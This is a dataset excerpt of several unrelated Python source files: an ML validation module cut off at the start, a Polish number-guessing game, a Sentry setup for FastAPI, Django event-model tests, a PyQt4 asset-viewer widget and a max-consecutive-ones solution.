prediction=pd.concat([a,real],axis=1)\n\n acc=accuracy(prediction.iloc[:,0],prediction.iloc[:,1])\n prec=precision(prediction.iloc[:,0],prediction.iloc[:,1])\n rec=recall(prediction.iloc[:,0],prediction.iloc[:,1])\n f1=f1_score(prediction.iloc[:,0],prediction.iloc[:,1])\n\n print('accuracy : '+str(acc)+'\\nprecision :'+str(prec)\n +'\\nrecall : '+str(rec)+'\\nf1_score : '+str(f1))\n\n return prediction\n\ndef cal_external_auc(test_df,y_score):\n# calculate auc and aupr for test data\n# input : test data, y_score for feature of test data\n\n test_y=test_df.iloc[-1, 1:]\n test_y=make_binary('normal','cancer',test_y).values\n fpr,tpr,threshold = roc_curve(test_y,y_score)\n roc_auc=auc(fpr,tpr)\n aupr_value=aupr(test_y,y_score)\n print('auc : '+str(roc_auc)+'\\naupr : '+str(aupr_value))\n\n return roc_auc, aupr_value\n\n\ndef cal_auc(inputdf,model,testratio):\n #preprocessing for ROC curve\n\n input_data=inputdf.iloc[:,1:].transpose()\n X_data=input_data.iloc[:,:-1].values\n y_data=input_data.iloc[:,-1]\n y_data=make_binary('normal','cancer',y_data)\n\n X_train, X_test, y_train, y_test = train_test_split(X_data, y_data, test_size=testratio\n ,random_state=RandomState(None))\n model.fit(X_train,y_train)\n\n y_score=model.decision_function(X_test)\n fpr,tpr,threshold = roc_curve(y_test,y_score,pos_label=1)\n roc_auc=auc(fpr,tpr)\n Aupr=aupr(y_test,y_score)\n\n return y_score,fpr,tpr,threshold,roc_auc\n\ndef draw_roc(inputdf,model,testratio):\n# draw roc curve\n# input : training data, model, ratio for test\n\n plt.figure()\n lw=2\n y_score,fpr,tpr,threshold,roc_auc= cal_auc(inputdf,model,testratio)\n\n plt.plot(fpr,tpr,color='darkorange',lw=lw,label='ROC curve (area=%0.2f)' % roc_auc)\n plt.plot([0,1],[0,1],color='navy',lw=lw,linestyle='--')\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.legend(loc=\"lower right\")\n","sub_path":"machineLearning/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"622256349","text":"# Sebastian Staszczyk\n\nimport random\nnumber = random.randint(1, 6)\ni = 0\ncounter = 0\nwhile i==0:\n try:\n attempt = int(input('Podaj liczbę od 1 do 6: '))\n counter += 1\n if attempt == number:\n print('')\n print(f\"Gratulacje! Wygrałeś. Szukana liczba to: {number}\")\n print(f\"Udało się po: {counter} próbie.\")\n break\n else:\n print('')\n print(f\"Nie udało się. Próbuj dalej!\")\n except ValueError:\n print('\\033[1m' +'Tylko cyfry!')\n continue\n ","sub_path":"01-TypesAndVariables/After class/Zad 29 - Gra z komputerem.py","file_name":"Zad 29 - Gra z komputerem.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"632735049","text":"from typing import Dict, List\n\nimport sentry_sdk\nfrom fastapi import Request\n\nfrom src.config import env\nfrom src.exceptions.exception import Unauthorized\n\n\ndef start_sentry(integrations: List = []) -> None:\n \"\"\"\n Initialize Sentry to capture errors\n \"\"\"\n sentry_sdk.init(\n environment=env.APP_ENV,\n dsn=env.SENTRY_DSN,\n integrations=integrations,\n before_send=before_send,\n debug=env.APP_DEBUG,\n )\n\n\ndef send_sentry_event(exc: BaseException, request: Request):\n if env.APP_DEBUG:\n return\n with sentry_sdk.push_scope() as scope:\n scope.set_context(\"request\", request)\n scope.user = {\"ip_address\": request.client.host, \"request\": request}\n sentry_sdk.capture_exception(exc)\n\n\ndef before_send(event: Dict, hint: Dict):\n \"\"\"\n Ignore specific types of exceptions here\n Source: https://github.com/getsentry/sentry-python/issues/149#issuecomment-434448781\n \"\"\"\n\n if \"exc_info\" in hint:\n exc_type, exc_value, tb = hint[\"exc_info\"]\n if is_error_ignored(exc_value):\n return None\n\n return event\n\n\ndef is_error_ignored(exception: Exception) -> bool:\n \"\"\"\n Check if the given exception is to be ignored\n \"\"\"\n return isinstance(exception, (Unauthorized))\n","sub_path":"src/lib/sentry.py","file_name":"sentry.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"332834673","text":"\"\"\"Contain the unit tests related to the models in app ``events``.\"\"\"\n\nimport datetime\n\nfrom django.test import TestCase\n\nfrom teamspirit.core.models import Address, Location\nfrom teamspirit.events.models import Event\n\n\nclass EventModelTestsCase(TestCase):\n \"\"\"Test the model ``Event``.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.address = Address.objects.create(\n label_first=\"1 rue de l'impasse\",\n label_second=\"\",\n postal_code=\"75000\",\n city=\"Paris\",\n country=\"France\"\n )\n cls.location = Location.objects.create(\n name=\"Salle des fêtes de Paris\",\n address=cls.address\n )\n cls.event = Event.objects.create(\n date=datetime.date(2020, 9, 6),\n time=datetime.time(10, 30),\n title=\"Assemblée Générale de l'association\",\n location=cls.location\n )\n\n def test_event_is_event_instance(self):\n \"\"\"Unit test - app ``events`` - model ``Event`` - #1.1\n\n Test that event is an ``Event`` instance.\n \"\"\"\n self.assertIsInstance(self.event, Event)\n\n def test_date(self):\n \"\"\"Unit test - app ``events`` - model ``Event`` - #1.2\n\n Test the date.\n \"\"\"\n self.assertIsInstance(self.event.date, datetime.date)\n self.assertEqual(self.event.date, datetime.date(2020, 9, 6))\n\n def test_time(self):\n \"\"\"Unit test - app ``events`` - model ``Event`` - #1.3\n\n Test the time.\n \"\"\"\n self.assertIsInstance(self.event.time, datetime.time)\n self.assertEqual(self.event.time, datetime.time(10, 30))\n","sub_path":"tests/unit/events/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"199609072","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\n Author: kun.wang\n Create: 2013-04-26\n'''\n\nimport os, sys, string\nimport math\nimport random\nfrom PyQt4 import QtCore, QtGui\n\nfrom pCore import *\n\nbackground_colors = [\n QtGui.QColor(255, 103, 103),\n QtGui.QColor(255, 160, 103),\n QtGui.QColor(226, 125, 43),\n QtGui.QColor(84, 201, 87),\n QtGui.QColor(53, 200, 160),\n QtGui.QColor(63, 175, 23),\n QtGui.QColor(123, 120, 240),\n QtGui.QColor(207, 96, 220),\n QtGui.QColor(230, 82, 160),\n QtGui.QColor(146, 146, 146),\n]\n\npColor = {\n 'red' : QtGui.QColor(255, 0, 0),\n 'green' : QtGui.QColor(0, 255, 0),\n 'blue' : QtGui.QColor(0, 0, 255),\n}\n\npBrush = {\n \"white\" : QtGui.QBrush(QtGui.QColor(255, 255, 255)),\n \"red\" : QtGui.QBrush(QtGui.QColor(255, 0, 0)),\n \"green\" : QtGui.QBrush(QtGui.QColor(0, 255, 0)),\n \"blue\" : QtGui.QBrush(QtGui.QColor(0, 0, 255))\n}\n\npPen = {\n \"white\" : QtGui.QPen(QtGui.QColor(255, 255, 255)),\n \"light_gray\" : QtGui.QPen(QtGui.QColor(200, 200, 200)),\n \"red\" : QtGui.QPen(QtGui.QColor(255, 0, 0)),\n \"green\" : QtGui.QPen(QtGui.QColor(0, 255, 0)),\n \"blue\" : QtGui.QPen(QtGui.QColor(0, 0, 255))\n}\n\nclass AssetViewer(QtGui.QWidget, Asset):\n \"\"\"\n Use this widget to display asset.\n \"\"\"\n def __init__(self):\n QtGui.QWidget.__init__(self)\n Asset.__init__(self)\n \n self.isSelected = False\n self.isLoaded = False\n self.hasThumb = False\n\n self.initDrawAttrib()\n self.initFeatherAttrib()\n \n def initDrawAttrib(self):\n self.name_font = QtGui.QFont()\n\n self.bg_color = background_colors[random.randrange(10)]\n self.edge_size = 5\n self.pen_selected = QtGui.QPen(QtGui.QColor(255, 255, 0))\n self.pen_selected.setWidth(self.edge_size) \n self.pen_selected.setJoinStyle(QtCore.Qt.MiterJoin)\n\n self.image_thumb = QtGui.QImage()\n\n def initFeatherAttrib(self):\n self.setToolTip(self.name)\n\n def setThumb(self, thumb = None):\n if thumb:\n if os.path.isfile(thumb):\n self.image_thumb.load(thumb)\n self.hasThumb = True\n else:\n self.hasThumb = False\n self.repaint()\n\n def setSelected(self, selected = True):\n self.isSelected = selected\n self.repaint()\n \n def setLoaded(self, loaded = True):\n self.isLoaded = loaded\n self.repaint()\n\n def changeSize(self, x, y):\n self.resize(x, y)\n self.repaint()\n\n def paintEvent(self, event):\n painter = QtGui.QPainter(self)\n asset_name_height = max(self.height() * 0.15, 5)\n asset_name_y = self.height() * 0.75\n # draw background\n painter.fillRect(self.rect(), self.bg_color)\n if self.hasThumb:\n thumb_rect = QtCore.QRect(0, asset_name_height, self.width(), self.height() - asset_name_height)\n painter.drawImage(self.rect(), self.image_thumb)\n # draw asset name\n painter.fillRect(0, asset_name_y, self.width(), asset_name_height, QtGui.QColor(40, 40, 40, 40))\n\n painter.setPen(pPen['white'])\n self.name_font.setPixelSize(asset_name_height)\n painter.setFont(self.name_font)\n painter.drawText(self.edge_size, asset_name_y + asset_name_height * 0.8, \"%s\" % self.name)\n if self.version:\n painter.drawText(self.width() - self.edge_size - asset_name_height * 1.5, asset_name_height, '%s' % self.version)\n\n box_size = self.height() - asset_name_y - asset_name_height + 1\n painter.setPen(QtCore.Qt.NoPen)\n if 1:\n painter.fillRect(0, asset_name_y + asset_name_height, box_size, box_size, pColor['red'])\n if 1:\n painter.fillRect(box_size, asset_name_y + asset_name_height, box_size, box_size, pColor['green'])\n if 1:\n painter.fillRect(box_size * 2, asset_name_y + asset_name_height, box_size, box_size, pColor['blue'])\n\n if self.isSelected:\n painter.setPen(self.pen_selected)\n painter.drawRect(self.edge_size/2, self.edge_size/2,\\\n self.width() - self.edge_size, self.height() - self.edge_size)\n\n def mouseReleaseEvent(self, event):\n if event.button() == QtCore.Qt.LeftButton:\n self.setSelected(not self.isSelected)\n self.emit(QtCore.SIGNAL(\"select\"), self.id)\n\nclass AssetContainer(QtGui.QScrollArea):\n def __init__(self, parent = None, assets = None):\n QtGui.QScrollArea.__init__(self, parent)\n self.item_area = QtGui.QWidget()\n self.setWidget(self.item_area)\n\n self.item_x = 128\n self.item_y = 128\n self.item_min = 64\n self.item_max = 256\n self.edge = 10\n self.size_x = self.item_x + self.edge\n self.size_y = self.item_y + self.edge\n self.auto_space = False\n \n def addAsset(self, asset):\n asset.setParent(self.item_area)\n asset.changeSize(self.item_x, self.item_y)\n asset.show()\n \n def addAssets(self, assets):\n for asset in assets:\n self.addAsset(asset)\n self.layout()\n \n def removeAssets(self):\n assets = self.item_area.children()\n if assets:\n for asset in assets:\n asset.setParent(None)\n \n def layout(self):\n w = self.width() - 20\n assets = self.item_area.children()\n\n num_x = max(math.ceil(w / (self.item_x + self.edge)), 1) # Can do -1\n num_y = math.ceil(len(assets) / num_x)\n self.item_area.resize(w, num_y * (self.item_y + self.edge) + 50)\n\n main_w = self.item_area.width()\n main_h = self.item_area.height()\n num_x = max(math.ceil(main_w / (self.item_x + self.edge)), 1) # Can do -1\n \n x = 0\n y = 0\n for i in range(len(assets)):\n space_x = 0\n if self.auto_space:\n space_x = (main_w - self.edge * 2 - num_x * (self.item_x + self.edge)) / num_x\n assets[i].move(self.edge * 2 + x * (self.item_x + self.edge + space_x), self.edge*2 + y * (self.item_y + self.edge))\n x += 1\n if x >= num_x:\n x = 0\n y += 1\n \n def resizeEvent(self, event):\n self.layout()\n \n def changeItemSize(self, mount):\n assets = self.item_area.children()\n self.item_x += mount\n if self.item_x > self.item_max:\n self.item_x = self.item_max\n elif self.item_x < self.item_min:\n self.item_x = self.item_min\n \n self.item_y += mount\n if self.item_y > self.item_max:\n self.item_y = self.item_max\n elif self.item_y < self.item_min:\n self.item_y = self.item_min\n \n for a in assets:\n a.changeSize(self.item_x, self.item_y)\n \n self.layout()\n\n def keyPressEvent(self, event):\n key = event.key()\n if key == 93:\n self.changeItemSize(2)\n if key == 91:\n self.changeItemSize(-2)\n\n\n\nif __name__ == \"__main__\":\n app = QtGui.QApplication(sys.argv)\n desktop = app.desktop()\n deskrect = desktop.screenGeometry()\n px = deskrect.width()\n py = deskrect.height()\n \n container = AssetContainer()\n aaa = []\n for i in range(30):\n a = AssetViewer()\n if i%2 == 0:\n a.setThumb('E:\\\\project\\\\temp\\\\a%d.jpg' % (i%5))\n a.version = '%03d' % (i%10)\n\n container.addAsset(a)\n \n aaa.append(a)\n\n container.resize(500, 500)\n\n container.show()\n\n \n # t = Asset()\n # t.resize(200, 200)\n # t.version = '001'\n # t.show()\n\n sys.exit(app.exec_())\n \n","sub_path":"cgPipeline/old/AssetMG4/pUI.py","file_name":"pUI.py","file_ext":"py","file_size_in_byte":7711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"359737138","text":"class Solution(object):\n def findMaxConsecutiveOnes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n current_max = 0\n max_consecutives = 0\n for i in nums:\n if i == 1:\n current_max += 1\n max_consecutives = max(max_consecutives, current_max)\n else:\n current_max = 0\n return max_consecutives","sub_path":"max-consecutive-ones.py","file_name":"max-consecutive-ones.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}